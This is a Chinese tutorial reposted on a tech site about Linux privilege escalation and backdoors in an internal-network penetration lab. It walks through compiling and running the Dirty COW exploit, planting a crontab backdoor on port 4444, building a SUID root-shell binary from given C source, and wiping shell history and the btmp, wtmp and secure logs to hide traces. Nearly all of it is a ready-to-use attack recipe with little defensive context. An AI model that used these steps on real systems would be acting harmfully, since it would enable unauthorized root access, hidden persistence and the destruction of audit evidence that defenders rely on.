内网渗透 之如何使用提权和后门植入

发布时间:2021-10-23 18:04:48 作者:iii
来源:亿速云 阅读:217

本篇内容介绍了“内网渗透 之如何使用提权和后门植入”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!

linux提权和后门植入

1. 脏牛漏洞复现

(1) 去网页上把dirty.c中的代码复下来,制然后touch(创建)一个.c文件,vi或者vim打开将代码复制进去保存

(不能在kali上直接wget下载https://github.com/FireFart/dirtycow/blob/master/dirty.c,因为这样会把整个网页下载下来(亲测))

内网渗透 之如何使用提权和后门植入

内网渗透 之如何使用提权和后门植入

(2) 进入shell然后从kali开的apache服务上下载

内网渗透 之如何使用提权和后门植入

(3) 编译1.c文件

内网渗透 之如何使用提权和后门植入

gcc -pthread 1.c -o dirty -lcrypt                编译.c文件

(4) 执行文件

内网渗透 之如何使用提权和后门植入

内网渗透 之如何使用提权和后门植入

./dirty | ./dirty 自定义密码

测试完记得将备份的password.bak(原)覆盖过去

(5) 切换改写过后的管理员账户(成功提权)

内网渗透 之如何使用提权和后门植入

2. crontab计划任务

(1) vim /etc/crontab进入编辑(前提是有管理员权限)

内网渗透 之如何使用提权和后门植入

(2) 重启后4444端口在运行

(3) 可以控制

内网渗透 之如何使用提权和后门植入

3. suid提权(前提成功提权过一次,相当于留提权留后门)

(1) 创建一个suid.c的文件(由于靶机太难编辑了,所以我kali编辑完后用wget下载过去)

内网渗透 之如何使用提权和后门植入

内网渗透 之如何使用提权和后门植入

#include<stdlib.h> main(){setuid(0);system(“/bin/bash”);}

(2) 用wget下载suid

(3) gcc编译suid.c文件

内网渗透 之如何使用提权和后门植入

gcc suid.c -o suid

(4) 修改suid的权限(将文件赋予执行该文件的以管理员身份执行改文件)

(5) 重启后的靶机可以直接执行./suid进行提权(不需要密码)

内网渗透 之如何使用提权和后门植入

4. linux痕迹清除

(1) 仅清理当前用户: history -c

内网渗透 之如何使用提权和后门植入

(2) 使系统不再保存命令记录:vi /etc/profile,找到HISTSIZE这个值,修改为0

内网渗透 之如何使用提权和后门植入

删除记录

(3) 删除登录失败记录:echo > /var/log/btmp

(4) 删除登录成功记录:echo > /var/log/wtmp (此时执行last命令就会发现没有记录)

内网渗透 之如何使用提权和后门植入

(5) 删除日志记录:echo > /var/log/secure

“内网渗透 之如何使用提权和后门植入”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可以关注亿速云网站,小编将为大家输出更多高质量的实用文章!

推荐阅读:
  1. Windows内网渗透提权的实用命令有哪些
  2. 内网渗透的过程是什么

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

内网渗透

上一篇:适配器在JavaScript中的体现是怎么样的

下一篇:如何实现JavaScript的共享传递和按值传递

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》